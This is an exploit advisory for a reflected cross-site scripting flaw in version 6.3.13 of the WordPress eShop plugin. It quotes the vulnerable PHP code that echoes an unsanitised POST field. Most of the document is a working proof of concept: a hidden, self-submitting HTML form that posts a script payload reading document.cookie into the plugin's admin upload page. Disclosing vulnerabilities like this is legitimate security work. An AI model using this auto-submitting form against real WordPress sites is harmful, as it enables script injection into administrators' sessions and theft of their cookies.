WordPress eShop plugin version 6.3.13 suffers from a cross site scripting vulnerability.
e23cf2ca249e37beda9c5ac64979314f1328db60c63aca25bd874fdb5e7a32b6
<!--
# Exploit Title : WordPress eShop Plugin Reflected XSS
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/eshop/
# Software Link : https://downloads.wordpress.org/plugin/eshop.6.3.13.zip
# Date: 2015-09-04
# Version : 6.3.13
# Tested On : Elementary Os - Firefox
# Vulnerable Code:
# File: eshop-downloads.php , Line: 138 And 468
# Line 138:
# $atitle=$_POST['title'];
# Line 468:
<input type="text" name="title" id="filetitle" size="35" value="<?php
echo $atitle; ?>" />
# Exploit :
-->
<form
action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=eshop-downloads.php" Method="post" nAme="form1"
enctype="multipart/form-data">
<input name="upfile" type="HidDen" value="M" />
<input type="hIdden" name="max_file_size" value="67108864" />
<input type="HIDDEN" Name="title"
value='"><script>alert(document.cookie)</script><"'/>
<input name="overwrite" value="yes" type="hidden" />
<input type="hidden" name="up" value="upload File" class="button-primary" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>
<!--
# Discovered By : Ehsan Hosseini
-->